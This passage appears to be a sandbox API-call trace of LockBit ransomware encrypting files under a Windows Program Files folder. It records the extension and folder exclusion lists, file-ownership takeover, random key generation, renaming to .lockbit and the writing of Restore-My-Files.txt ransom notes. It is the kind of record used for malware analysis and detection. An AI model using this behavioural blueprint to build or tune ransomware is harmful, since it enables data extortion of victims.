(lpString1=".shs", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".drv", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".wpx", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".bat", lpString2=".bmp") returned -1 [0086.118] lstrcmpiW (lpString1=".rom", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".msc", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".spl", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".ps1", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".msu", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".ics", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".key", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".mp3", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".reg", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".dll", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".ini", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".idx", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".sys", lpString2=".bmp") returned 1 [0086.118] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1=".ico", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1=".lnk", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1=".rdp", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1=".lockbit", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="rectangle_widescreen_Thumbnail.bmp") returned 1 [0086.119] lstrcmpiW (lpString1="ntldr", lpString2="rectangle_widescreen_Thumbnail.bmp") returned -1 [0086.119] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="rectangle_widescreen_Thumbnail.bmp") returned -1 [0086.119] lstrcmpiW (lpString1="bootsect.bak", lpString2="rectangle_widescreen_Thumbnail.bmp") returned -1 [0086.119] lstrcmpiW (lpString1="autorun.inf", lpString2="rectangle_widescreen_Thumbnail.bmp") returned -1 [0086.119] lstrcmpiW (lpString1="thumbs.db", lpString2="rectangle_widescreen_Thumbnail.bmp") returned 1 [0086.119] lstrcmpiW (lpString1="iconcache.db", lpString2="rectangle_widescreen_Thumbnail.bmp") returned -1 [0086.119] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0086.119] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp") returned=".bmp" [0086.119] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1=".7z", lpString2=".bmp") returned -1 [0086.119] lstrcmpiW (lpString1=".ckp", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1=".dacpac", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1=".db", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1=".db-shm", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1=".db-wal", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1=".db3", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1=".dbc", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1=".dbs", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1=".dbt", lpString2=".bmp") returned 1 [0086.119] lstrcmpiW (lpString1=".dbv", lpString2=".bmp") returned 1 [0086.120] lstrcmpiW (lpString1=".frm", lpString2=".bmp") returned 1 [0086.120] lstrcmpiW (lpString1=".mdf", lpString2=".bmp") returned 1 [0086.120] lstrcmpiW (lpString1=".mrg", lpString2=".bmp") returned 1 [0086.120] lstrcmpiW (lpString1=".mwb", lpString2=".bmp") returned 1 [0086.120] lstrcmpiW (lpString1=".myd", lpString2=".bmp") returned 1 [0086.120] lstrcmpiW (lpString1=".ndf", lpString2=".bmp") returned 1 [0086.120] lstrcmpiW (lpString1=".qry", lpString2=".bmp") returned 1 [0086.120] lstrcmpiW (lpString1=".sdb", lpString2=".bmp") returned 1 [0086.120] lstrcmpiW (lpString1=".sdf", lpString2=".bmp") returned 1 [0086.120] lstrcmpiW (lpString1=".sql", lpString2=".bmp") returned 1 [0086.120] lstrcmpiW (lpString1=".sqlite", lpString2=".bmp") returned 1 [0086.120] lstrcmpiW (lpString1=".sqlite3", lpString2=".bmp") returned 1 [0086.120] lstrcmpiW (lpString1=".sqlitedb", lpString2=".bmp") returned 1 [0086.120] lstrcmpiW (lpString1=".tmd", lpString2=".bmp") returned 1 [0086.120] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp.lockbit") returned 87 [0086.120] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_widescreen_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.121] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.121] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.121] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.121] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.121] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.122] RtlFreeAnsiString (AnsiString="\\") [0086.122] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3bc) returned 0x0 [0086.122] malloc (_Size=0x200) returned 0x77d800 [0086.122] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0086.122] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.122] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.122] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.122] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0086.123] CloseHandle (hObject=0x3bc) returned 1 [0086.123] free (_Block=0x77d800) [0086.123] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_widescreen_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0086.123] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.123] malloc (_Size=0x40068) returned 0x1fb18c0 [0086.123] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5072) returned 1 [0086.123] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.124] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0086.124] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.124] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0086.124] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0086.130] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.130] malloc (_Size=0xc4) returned 0x1ff1e60 [0086.130] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xc4, FileInformationClass=0xa) returned 0xc0000008 [0086.130] free (_Block=0x1ff1e60) [0086.130] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0086.130] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0086.130] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.131] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa119af33, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa12338ef, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="ResizingPanels", cAlternateFileName="RESIZI~1")) returned 1 [0086.131] lstrcmpiW (lpString1=".", lpString2="ResizingPanels") returned -1 [0086.131] lstrcmpiW (lpString1="..", lpString2="ResizingPanels") returned -1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="$windows.~bt") returned 1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="intel") returned 1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="msocache") returned 1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="$recycle.bin") returned 1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="$windows.~ws") returned 1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="tor browser") returned -1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="boot") returned 1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="system volume information") returned -1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="perflogs") returned 1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="google") returned 1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="application data") returned 1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="windows") returned -1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="windows.old") returned -1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="appdata") returned 1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="Windows nt") returned -1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="Msbuild") returned 1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="Microsoft") returned 1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="All users") returned 1 [0086.131] lstrcmpiW (lpString1="ResizingPanels", lpString2="mozilla") returned 1 [0086.132] lstrcmpiW (lpString1="ResizingPanels", lpString2="Microsoft.NET") returned 1 [0086.132] lstrcmpiW (lpString1="ResizingPanels", lpString2="microsoft shared") returned 1 [0086.132] lstrcmpiW (lpString1="ResizingPanels", lpString2="Internet Explorer") returned 1 [0086.132] lstrcmpiW (lpString1="ResizingPanels", lpString2="common files") returned 1 [0086.132] lstrcmpiW (lpString1="ResizingPanels", lpString2="opera") returned 1 [0086.132] lstrcmpiW (lpString1="ResizingPanels", lpString2="Windows Journal") returned -1 [0086.132] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 59 [0086.132] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\*") returned 61 [0086.132] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0086.150] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0086.150] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa119af33, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa86cdff, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa12338ef, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.151] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0086.151] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0086.151] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7091adcb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7091adcb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4efa391f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0086.151] lstrcmpiW (lpString1=".", lpString2="1047x576black.png") returned -1 [0086.151] lstrcmpiW (lpString1="..", lpString2="1047x576black.png") returned -1 [0086.151] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0086.151] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0086.151] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0086.151] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0086.152] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0086.152] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0086.152] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0086.152] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0086.152] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0086.152] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.152] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0086.152] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0086.152] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0086.152] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0086.152] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0086.152] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0086.152] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0086.152] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0086.152] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0086.152] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0086.152] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0086.152] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0086.152] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0086.152] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0086.152] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0086.152] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0086.152] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0086.153] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0086.153] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0086.153] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0086.153] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0086.153] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0086.153] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="1047x576black.png") returned 1 [0086.153] lstrcmpiW (lpString1="ntldr", lpString2="1047x576black.png") returned 1 [0086.153] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="1047x576black.png") returned 1 [0086.153] lstrcmpiW (lpString1="bootsect.bak", lpString2="1047x576black.png") returned 1 [0086.153] lstrcmpiW (lpString1="autorun.inf", lpString2="1047x576black.png") returned 1 [0086.153] lstrcmpiW (lpString1="thumbs.db", lpString2="1047x576black.png") returned 1 [0086.153] lstrcmpiW (lpString1="iconcache.db", lpString2="1047x576black.png") returned 1 [0086.153] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\") returned="" [0086.153] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png") returned=".png" [0086.153] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0086.153] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0086.153] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0086.153] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0086.153] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0086.153] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0086.153] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0086.153] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0086.153] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0086.153] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0086.153] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0086.154] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0086.154] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0086.154] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0086.154] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0086.154] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0086.154] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0086.154] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0086.154] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0086.154] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0086.154] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0086.154] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0086.154] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0086.154] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0086.154] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0086.154] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0086.154] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0086.154] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0086.154] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png.lockbit") returned 85 [0086.154] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0086.155] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0086.155] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0086.155] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.155] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0086.155] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0086.155] RtlFreeAnsiString (AnsiString="\\") [0086.156] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0086.156] malloc (_Size=0x200) returned 0x77d800 [0086.156] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0086.156] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.156] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0086.156] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.156] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0086.157] CloseHandle (hObject=0x3b8) returned 1 [0086.157] free (_Block=0x77d800) [0086.157] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0086.157] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0086.157] malloc (_Size=0x40068) returned 0x1fb18c0 [0086.157] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4570) returned 1 [0086.157] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.158] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0086.158] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0086.159] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0086.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0086.159] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0086.168] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0086.168] malloc (_Size=0xc0) returned 0x1ff1e60 [0086.168] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc0, FileInformationClass=0xa) returned 0xc0000008 [0086.169] free (_Block=0x1ff1e60) [0086.169] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 1 [0086.169] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt") returned 80 [0086.169] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0086.169] CreateIoCompletionPort (FileHandle=0x3b8, 